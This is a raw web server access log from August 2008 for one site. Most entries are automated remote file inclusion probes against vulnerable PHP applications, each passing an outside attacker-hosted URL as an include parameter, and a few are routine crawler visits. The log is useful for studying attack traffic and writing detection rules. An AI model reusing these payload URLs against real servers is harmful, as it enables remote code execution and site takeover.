195.5.163.212 - - [10/Aug/2008:13:09:45 -0700] "GET /learnPath/include/scormExport.inc.php?includePath=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
195.5.163.212 - - [10/Aug/2008:13:09:45 -0700] "GET /logs/learnPath/include/scormExport.inc.php?includePath=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
207.210.115.114 - - [10/Aug/2008:13:09:49 -0700] "GET /logs/port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.195.37.178 - - [10/Aug/2008:13:09:50 -0700] "GET /logs/access.log HTTP/1.0" 200 449468 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.dmulk.com"
69.73.189.205 - - [10/Aug/2008:13:10:00 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [10/Aug/2008:13:10:11 -0700] "GET /logs/port.php?content=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [10/Aug/2008:13:10:11 -0700] "GET /port.php?content=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:10:13 -0700] "GET /logs/port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:10:13 -0700] "GET /port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:10:16 -0700] "GET /logs/port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:10:16 -0700] "GET /port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.210.115.114 - - [10/Aug/2008:13:10:34 -0700] "GET /logs/access_080215.log/port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.106 - - [10/Aug/2008:13:10:34 -0700] "GET /logs/port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [10/Aug/2008:13:10:35 -0700] "GET /port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [10/Aug/2008:13:10:38 -0700] "GET /learnPath/include/scormExport.inc.php?includePath=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
194.79.75.195 - - [10/Aug/2008:13:10:38 -0700] "GET /logs/learnPath/include/scormExport.inc.php?includePath=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:10:40 -0700] "GET /logs//protection.php?action=logout&siteurl=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:10:40 -0700] "GET //protection.php?action=logout&siteurl=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
207.210.115.114 - - [10/Aug/2008:13:10:41 -0700] "GET /logs/port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.210.115.114 - - [10/Aug/2008:13:10:41 -0700] "GET /port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.106 - - [10/Aug/2008:13:10:44 -0700] "GET /logs/port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [10/Aug/2008:13:10:45 -0700] "GET /port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [10/Aug/2008:13:10:47 -0700] "GET /logs/port.php?content=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [10/Aug/2008:13:10:47 -0700] "GET /port.php?content=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.115.114 - - [10/Aug/2008:13:11:01 -0700] "GET /logs/port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.220.84.139 - - [10/Aug/2008:13:11:05 -0700] "GET /logs/access_080215.log/?step=1&vwar_root=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.115.114 - - [10/Aug/2008:13:11:07 -0700] "GET /port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.253.223.90 - - [10/Aug/2008:13:11:10 -0700] "GET /logs/port.php?content=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [10/Aug/2008:13:11:10 -0700] "GET /port.php?content=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.220.84.139 - - [10/Aug/2008:13:11:11 -0700] "GET /?step=1&vwar_root=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.805" "www.dmulk.com"
83.220.84.139 - - [10/Aug/2008:13:11:11 -0700] "GET /logs/?step=1&vwar_root=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 59997 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:13:11:34 -0700] "GET /logs/access_080110.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:13:11:34 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:13:11:35 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.102.100 - - [10/Aug/2008:13:12:21 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.85.102.100 - - [10/Aug/2008:13:12:21 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:13:13:25 -0700] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:13:13:26 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.220.84.139 - - [10/Aug/2008:13:13:30 -0700] "GET /logs/access_080114.log/?step=1&vwar_root=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.5.163.212 - - [10/Aug/2008:13:14:51 -0700] "GET /learnPath/include/scormExport.inc.php?includePath=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.5.163.212 - - [10/Aug/2008:13:14:58 -0700] "GET /logs/access_080114.log/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.5.163.212 - - [10/Aug/2008:13:14:58 -0700] "GET /logs/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.245 - - [10/Aug/2008:13:15:07 -0700] "GET /index.php?sayfa=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 200 18511 "-" "libwww-perl/5.810" "www.dmulk.com"
195.5.163.212 - - [10/Aug/2008:13:15:24 -0700] "GET /logs/access_080127.log/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.77 - - [10/Aug/2008:13:16:37 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tramiche.org/l33tb1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.185.237.77 - - [10/Aug/2008:13:16:37 -0700] "GET /logs/access_080117.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tramiche.org/l33tb1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.185.237.77 - - [10/Aug/2008:13:16:38 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tramiche.org/l33tb1t.gif??? HTTP/1.1" 200 18593 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.185.237.77 - - [10/Aug/2008:13:17:02 -0700] "GET /logs/access_080215.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tramiche.org/l33tb1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:13:17:09 -0700] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:13:17:09 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
65.55.211.28 - - [10/Aug/2008:13:17:34 -0700] "GET /bikes/WeSTOC07/?M=A HTTP/1.1" 200 971 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:13:18:55 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:13:19:25 -0700] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:19:58 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:19:59 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:19:59 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:13:20:00 -0700] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:13:20:00 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.245.192.26 - - [10/Aug/2008:13:20:01 -0700] "GET /logs/access_080309.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.245.192.26 - - [10/Aug/2008:13:20:01 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:20:04 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:20:04 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:20:05 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [10/Aug/2008:13:20:34 -0700] "GET /logs/access_080213.log/?sourcedir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.222.143.140 - - [10/Aug/2008:13:20:41 -0700] "GET /logs//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www1.myweb.ge/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.222.143.140 - - [10/Aug/2008:13:20:41 -0700] "GET //claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www1.myweb.ge/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.222.143.140 - - [10/Aug/2008:13:20:41 -0700] "GET /logs/access_080114.log//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www1.myweb.ge/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.222.143.140 - - [10/Aug/2008:13:20:41 -0700] "GET /logs/access_080201.log//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www1.myweb.ge/V7ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.174.80.254 - - [10/Aug/2008:13:20:58 -0700] "GET /logs/lib/gore.php?libpath=http://www.usa-westen.info/cms/images/save.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.80.254 - - [10/Aug/2008:13:20:59 -0700] "GET /lib/gore.php?libpath=http://www.usa-westen.info/cms/images/save.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:21:45 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:21:45 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:21:45 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:21:46 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:21:46 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:21:46 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:13:22:10 -0700] "GET /logs/access_080226.log//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:22:17 -0700] "GET /logs/access_080105.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.72.91.58 - - [10/Aug/2008:13:22:17 -0700] "GET /logs/access_080105.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.192.66.20 - - [10/Aug/2008:13:22:24 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.66.20 - - [10/Aug/2008:13:22:24 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.66.20 - - [10/Aug/2008:13:22:24 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.245.192.26 - - [10/Aug/2008:13:22:58 -0700] "GET /logs/access_080226.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
93.174.0.10 - - [10/Aug/2008:13:23:15 -0700] "GET /postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.10 - - [10/Aug/2008:13:23:15 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.10 - - [10/Aug/2008:13:23:15 -0700] "GET /logs/access_080127.log/postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:23:19 -0700] "GET /logs//index1.php?site=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:23:19 -0700] "GET //index1.php?site=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
93.174.0.10 - - [10/Aug/2008:13:23:20 -0700] "GET /logs/access_080404.log/postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.10 - - [10/Aug/2008:13:23:33 -0700] "GET /postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.10 - - [10/Aug/2008:13:23:33 -0700] "GET /logs/access_080127.log/postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.10 - - [10/Aug/2008:13:23:33 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.10 - - [10/Aug/2008:13:23:42 -0700] "GET /logs/access_080404.log/postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.10 - - [10/Aug/2008:13:24:02 -0700] "GET /postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.10 - - [10/Aug/2008:13:24:02 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.10 - - [10/Aug/2008:13:24:02 -0700] "GET /logs/access_080127.log/postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.10 - - [10/Aug/2008:13:24:09 -0700] "GET /logs/access_080404.log/postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.151.211 - - [10/Aug/2008:13:24:09 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [10/Aug/2008:13:24:09 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.151.211 - - [10/Aug/2008:13:24:09 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:24:20 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
88.168.106.155 - - [10/Aug/2008:13:24:35 -0700] "GET /postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [10/Aug/2008:13:24:35 -0700] "GET /logs/postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [10/Aug/2008:13:24:36 -0700] "GET /logs/access_080127.log/postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [10/Aug/2008:13:24:40 -0700] "GET /logs/access_080404.log/postscript/postscript.php?p_mode=http://www.xtremestyles.com/vwar/g4/upload/mail/a/help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.151.211 - - [10/Aug/2008:13:25:28 -0700] "GET /logs/access_080312.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.98.1.156 - - [10/Aug/2008:13:25:59 -0700] "GET /logs/access_080127.log%20//convert/mvcw.php?step=1&vwar_root=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:13:26:33 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:13:26:35 -0700] "GET /phphtml.php?htmlclass_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:13:26:37 -0700] "GET /logs/phphtml.php?htmlclass_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:13:27:01 -0700] "GET /minamijewelry/html/moon.html HTTP/1.0" 200 20920 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:28:31 -0700] "GET /logs/access_080315.log/index.php?fn=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:28:31 -0700] "GET /logs/access_080315.log/index.php?fn=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:28:31 -0700] "GET /logs/access_080315.log/index.php?fn=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.102.118.201 - - [10/Aug/2008:13:28:31 -0700] "GET /logs/access_080315.log/index.php?fn=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.36 - - [10/Aug/2008:13:28:32 -0700] "GET /megumi/minamigrad2k8/ HTTP/1.1" 200 25468 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
